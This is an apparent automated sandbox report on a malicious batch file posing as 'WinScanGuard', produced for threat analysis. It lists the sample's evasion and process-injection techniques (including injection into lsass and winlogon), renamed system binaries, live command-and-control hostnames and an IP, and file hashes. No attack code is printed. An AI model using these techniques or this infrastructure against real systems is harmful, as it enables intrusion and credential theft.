Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Scripting; 1 Obfuscated Files or Information; 3 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 121 Masquerading; 1 Valid Accounts; 41 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 413 Process Injection; 1 Hidden Files and Directories
Credential Access: 11 Input Capture
Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 37 System Information Discovery; 1 Query Registry; 41 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery
Lateral Movement: none
Collection: 1 Archive Collected Data; 1 Email Collection; 11 Input Capture
Exfiltration: none
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol
Network Effects, Remote Service Effects, Impact, Resource Development, Reconnaissance: none

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1352643, Sample: WinScanGuard_v.2.1.bat, Startdate: 03/12/2023, Architecture: WINDOWS, Score: 100

Contacted hosts: throbbing-mountain-09011.pktriot.net; eu-central-7075.packetriot.net (167.71.56.116, remote port 22112, local ports 49736 and 49737, DIGITALOCEAN-ASN, United States)

Sample-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Detected unpacking (creates a PE file in dynamic memory); 6 other signatures

Process tree (graph node numbers in parentheses, signatures in square brackets):
- $sxr-mshta.exe (12) [Drops executables to the windows directory (C:\Windows) and starts them]
  - $sxr-cmd.exe (18) [Suspicious powershell command line found; Very long command line found; Bypasses PowerShell execution policy]
    - $sxr-powershell.exe (26), connects to eu-central-7075.packetriot.net 167.71.56.116 [Suspicious powershell command line found; Very long command line found; Drops executables to the windows directory (C:\Windows) and starts them; 8 other signatures]
      - dllhost.exe (40) [Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes], injects into winlogon.exe (51), lsass.exe (53), svchost.exe (56) and dwm.exe (58)
        - winlogon.exe (51) starts dllhost.exe (68), (71), (73) and (75); dllhost.exe (68) [Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes] injects into svchost.exe (77), (79) and (81); dllhost.exe (71) injects into svchost.exe (83)
        - lsass.exe (53) [Writes to foreign memory regions]
      - dllhost.exe (43), injects into WmiPrvSE.exe (60) and PHZMpSLEzcFKaRUZszZmeOVApLd.exe (62) and (64)
      - dllhost.exe (45), injects into PHZMpSLEzcFKaRUZszZmeOVApLd.exe (66)
      - 6 other processes (49) [Powershell is started from unusual location (likely to bypass HIPS)]
    - conhost.exe (30)
- cmd.exe (15), drops C:\Users\user\...\WinScanGuard_v.2.1.bat.exe (PE32+) [Renames powershell.exe to bypass HIPS]
  - WinScanGuard_v.2.1.bat.exe (21), drops C:\Windows\$sxr-powershell.exe, C:\Windows\$sxr-mshta.exe and C:\Windows\$sxr-cmd.exe (all PE32+) [Deletes itself after installation; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 3 other signatures]
    - dllhost.exe (32), starts WerFault.exe (47)
    - dllhost.exe (34), (36) and (38)
  - conhost.exe (24)

Source | Detection | Scanner | Label
WinScanGuard_v.2.1.bat | 0% | ReversingLabs |
WinScanGuard_v.2.1.bat | 3% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | 0% | ReversingLabs |
C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | 0% | Virustotal |
C:\Windows\$sxr-cmd.exe | 0% | ReversingLabs |
C:\Windows\$sxr-cmd.exe | 0% | Virustotal |
C:\Windows\$sxr-mshta.exe | 0% | ReversingLabs |
C:\Windows\$sxr-mshta.exe | 0% | Virustotal |
C:\Windows\$sxr-powershell.exe | 0% | ReversingLabs |
C:\Windows\$sxr-powershell.exe | 0% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
eu-central-7075.packetriot.net | 16% | Virustotal |
throbbing-mountain-09011.pktriot.net | 2% | Virustotal |

Source | Detection | Scanner | Label
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
eu-central-7075.packetriot.net | 167.71.56.116 | true | true | | unknown
throbbing-mountain-09011.pktriot.net | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528E04000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/jsonschema | $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/json | $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.10.dr | false | | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6 | $sxr-powershell.exe, 00000015.00000002.2927032534.000002428794F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.0000024287975000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.000002428799C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/Vh5j3k | $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/JamesNK/Newtonsoft.Json | $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dahall/taskscheduler | WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/odirm | $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
167.71.56.116 | eu-central-7075.packetriot.net | United States | 14061 | DIGITALOCEAN-ASNUS | true
                                                        Joe Sandbox Version:38.0.0 Ammolite
                                                        Analysis ID:1352643
                                                        Start date and time:2023-12-03 16:54:14 +01:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 11m 13s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:33
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:12
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample file name:WinScanGuard_v.2.1.bat
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winBAT@49/18@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 93.3%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 87
                                                        • Number of non-executed functions: 289
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .bat
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.65.92
                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target dllhost.exe, PID 7132 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
16:55:14 | API Interceptor | 26x Sleep call for process: WinScanGuard_v.2.1.bat.exe modified
16:55:29 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
16:55:32 | API Interceptor | 149691x Sleep call for process: $sxr-powershell.exe modified
16:56:15 | API Interceptor | 112145x Sleep call for process: winlogon.exe modified
16:56:17 | API Interceptor | 104518x Sleep call for process: dwm.exe modified
16:56:18 | API Interceptor | 69431x Sleep call for process: lsass.exe modified
16:56:19 | API Interceptor | 1018x Sleep call for process: svchost.exe modified
16:56:21 | API Interceptor | 343x Sleep call for process: PHZMpSLEzcFKaRUZszZmeOVApLd.exe modified
16:56:23 | API Interceptor | 220x Sleep call for process: conhost.exe modified
Match: 167.71.56.116
Associated Sample Name / URL | Detection | Threat Name | Context
Shadow-Stealer.bat | malicious | Quasar |
OvA6x5v34G.exe | malicious | AsyncRAT |
zUYpYikG7T.exe | malicious | njRat |
SdwkQEBnc3.exe | malicious | Nanocore |
riV1K85Awe.exe | malicious | Nanocore |
Malwarebytes Gears.exe | malicious | AsyncRAT |
H8RZSly6dG.exe | malicious | Njrat |
8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exe | malicious | njRat |
qCotr6jZt2.exe | malicious | njRat |
Match: eu-central-7075.packetriot.net
Associated Sample Name / URL | Detection | Threat Name | Context
Shadow-Stealer.bat | malicious | Quasar | 167.71.56.116
OvA6x5v34G.exe | malicious | AsyncRAT | 167.71.56.116
zUYpYikG7T.exe | malicious | njRat | 167.71.56.116
SdwkQEBnc3.exe | malicious | Nanocore | 167.71.56.116
riV1K85Awe.exe | malicious | Nanocore | 167.71.56.116
Malwarebytes Gears.exe | malicious | AsyncRAT | 167.71.56.116
Match: DIGITALOCEAN-ASNUS
Associated Sample Name / URL | Detection | Threat Name | Context
Shadow-Stealer.bat | malicious | Quasar | 167.71.56.116
76IbxcfOQf.exe | malicious | Lokibot | 178.128.238.137
file.exe | malicious | RedLine, SmokeLoader, Stealc | 37.139.22.180
file.exe | malicious | RedLine, SmokeLoader | 37.139.22.180
REQUEST FOR 01-DEC 2023.exe | malicious | FormBook | 64.225.91.73
Altogether.exe | malicious | FormBook, GuLoader | 64.225.91.73
Plyshaar.exe | malicious | FormBook, GuLoader | 64.225.91.73
SecuriteInfo.com.Win32.PWSX-gen.16993.11761.exe | malicious | Lokibot | 178.128.238.137
SecuriteInfo.com.Win32.PWSX-gen.1907.2567.exe | malicious | Lokibot | 178.128.238.137
file.exe | malicious | RedLine, SmokeLoader | 165.227.156.49
DocScan 105811-26.exe | malicious | FormBook | 64.225.91.73
m2jngcTeBu.elf | malicious | Mirai | 162.243.214.175
DocScan 814-1125-2023.exe | malicious | FormBook | 64.225.91.73
https://login.logggiondocuumennnt.click/?username=cew@smrw.com | malicious | HTMLPhisher | 188.166.83.143
tHRIRkYRbE.elf | malicious | Mirai | 138.68.169.154
file.exe | malicious | RedLine, SmokeLoader | 67.205.189.1
file.exe | malicious | RedLine, SmokeLoader | 142.93.169.197
http://192.241.199.70 | malicious | Unknown | 192.241.199.70
file.exe | malicious | BitCoin Miner, RedLine, SmokeLoader | 165.22.196.27
file.exe | malicious | RedLine, SmokeLoader | 68.183.34.12
                                                                          No context
Match: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
Associated Sample Name / URL | Detection | Threat Name | Context
Shadow-Stealer.bat | malicious | Quasar |
trafik_yenilme.bat | malicious | Remcos, zgRAT |
a.bat | malicious | Agniane Stealer, zgRAT |
Rune_Launcher.bat | malicious | Quasar |
SCO_23.bat | malicious | zgRAT |
IMG_690B23.docx.bat | malicious | AgentTesla |
Qtagiietkyb.png.bat | malicious | Strela Stealer |
IMG_690B23.bat | malicious | AgentTesla, zgRAT |
SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe | malicious | Unknown |
SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe | malicious | Unknown |
345d.cmd | malicious | Unknown |
file.exe | malicious | Unknown |
file.exe | malicious | Unknown |
PingOptimizerMain.bat | malicious | Quasar |
crack.bat | malicious | Unknown |
da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat | malicious | Quasar |
Final_rooming_list.bat | malicious | Blackshades, Quasar |
RE_432-7784.js | malicious | Unknown |
FA150623.pdf.bat | malicious | AgentTesla |
Uni.bat | malicious | Unknown |
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.6168607357178283
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:lrF4Aypwfs9stDaQ1yDf/QXIDcQzc6CmcE1cw3Cm505t+H4ZAX/d5FMT2SlPkpXY:BHUz900NXfnxzuiFBZ24IO84M
                                                                                                                  MD5:47399C62990857B59A574365850D9353
                                                                                                                  SHA1:00652450030722B18B43FB2DC2A4D3793DD3C6C5
                                                                                                                  SHA-256:F441C52CCFA9D357D4EE0E3F45BBA432CB71E7BA94220ECB56FDF5A9E6C4933A
                                                                                                                  SHA-512:399CB29B124FBADE0547278F78E878BF7157405CA70398162E73C2F37EB078DAEF897327FC5BC3D54A855884E6A4AB7EAD4FE534CFE5F14A0AEDD637C9923B20
                                                                                                                  Malicious:false
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.0.9.2.5.2.6.0.3.2.6.0.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.0.9.2.5.2.6.4.8.5.7.3.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.2.3.6.9.e.b.-.1.0.4.2.-.4.5.6.4.-.b.5.2.e.-.6.b.a.a.1.0.f.f.6.9.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.2.5.c.8.3.8.-.4.c.4.6.-.4.0.d.9.-.a.3.b.f.-.8.c.5.0.f.1.7.9.0.3.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.l.l.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.d.l.l.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.3.6.-.4.d.2.1.0.1.2.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.9.7.b.8.c.e.2.3.8.d.b.6.4.4.b.7.e.1.a.1.6.b.4.1.7.d.b.b.5.b.c.0.5.2.a.2.6.8.
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Sun Dec 3 15:55:26 2023, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20544
                                                                                                                  Entropy (8bit):2.1176116743448796
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:5tw8irfE3h6Ud2qWivzwQH48GQ+DXrnXPM5hrN6rlcl7jWI/WIJDOwM:bziVbvQon/ej6rlclRCwM
                                                                                                                  MD5:C45E43A45BEEFF12A59E6DB9FF61D52E
                                                                                                                  SHA1:6C4EE78029C862D142F80160C3FDA28BAA5ACB6E
                                                                                                                  SHA-256:A6EDCF7C739C2F89BD82A2726AD1D3A7ED714A42FC05E0FF8D66F0B4FC5F99FE
                                                                                                                  SHA-512:61514AB0ABFF60916F1131F1FAE6FB787299BC78D62F80248523C224816A018232B06FB1681FBFF0590E34B3235557DACE05F21952FBDCCDD40B240E632B848A
                                                                                                                  Malicious:false
                                                                                                                  Preview:MDMP..a..... ........le............4........... ...<.......d...............T.......8...........T...........(....J..........\...........H...............................................................................eJ..............GenuineIntel............T............le.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8320
Entropy (8bit): 3.697334964140081
Encrypted: false
SSDEEP: 192:R6l7wVeJyQ6zE6Y8nSUrgmfjPJSWOrpx089bxasf0Bbm:R6lXJt6w6YsSUrgmfjPJSWOVx5fJ
MD5: 8121C2753ACDF8E43727E1286DFF2E39
SHA1: 2C0C43B2115FE79926C154AE187DE0D978A2ECE7
SHA-256: B5BAACD7DD04EF443DF6B5F22DBF0F6F8E978E35B611D9311914544FA5665EDC
SHA-512: BB97355BEB5017D4B4AD96D75E3EB71E61687E19A1DD2E538B17FB811BF9B5F3C2018C52EC6361B4ACB95DDC55AA490F9C66A669BF4134E42428D608829FE1E5
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4649
Entropy (8bit): 4.443870618806782
Encrypted: false
SSDEEP: 48:cvIwWl8zspJg77aI9lSWpW8VYDYm8M4JsLFl+q8+y5ILHBQqCd:uIjf7I73z7VnJscKdlCd
MD5: F4F1D1901D4BC05CD07C183361A26759
SHA1: 4AEA5A072F80B2D59BC34CB57E726478951F988A
SHA-256: 45504EA8DD2A72B07EE4E3F72DA8B19CEDC6F50EEA125FAA34375A1745265670
SHA-512: C9DA81750A5E576AA0AADE6CAFBB04D72CD0306A31740F5FE45B0F704604651F0739F271A082C78A15C815CCDF85F3592BFC5F0F2E3A3DF80BC72434BBF39571
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="88258" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: CSV text
Category: dropped
Size (bytes): 3603
Entropy (8bit): 5.364531743127414
Encrypted: false
SSDEEP: 96:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHNYrKaq7mSRIzQ09wmj0qD:iqbYqGcQtpDxqKkWqmq1ftzHuLqdIzQk
MD5: CB025951AB11BC9879660B66AB48A871
SHA1: 539153A3469E5EA91A5700944F0CC3547C32AE21
SHA-256: 057D8F2026B51CBB81516E9A8DDE433D4AEBE1FF6E22D1CB60A742E1EA899367
SHA-512: E7095F21D3765FBC7E5F4E97C2CC37A8E56802D5AE7CAE1276BE62E096AF1B06B8B31B83CF7B475D6BE3D82186772B95ADB45A68A84AD060EDCCA3154B4CE6F9
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.887486353364779
Encrypted: false
SSDEEP: 192:I9sm73YrKkDp5hVsm5eml89smFp5IiMDOmEN3H+OHgFqxoeRM3YrKkDVsm5emlpj:HPYmiQ0HzAFItib4Mib4WVoGIpN6KQkT
MD5: 69E9F3FAAEAC92E92B26596DBA884D3B
SHA1: 02A87F2EAD0B9DC6202372D370B4D58D025B7CB2
SHA-256: F2453CFAB4FB2EB61E0E4DD4BAF35E926BE43E0C8E36569A3A325E605316B321
SHA-512: BD0EEF728D260D0BD217B507DC217BB96FA0C069FA872E6D5C8805B922ED81D9F0528AC1EE775F0BC1B1BB666FCE7B170385E5AE229A55D0D4FFF2AC936524FF
Malicious: false
Preview: PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-.l..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulPiCllp:NllUaml
MD5: 23CD0F32487D4C39C45260019751EE98
SHA1: 6AD7B5337078F75823A72D2AE378815F12D2BDDE
SHA-256: B1C6D3B064C65143F28727AC3FF69A42CD9844C70407E599832C5008D6A1C576
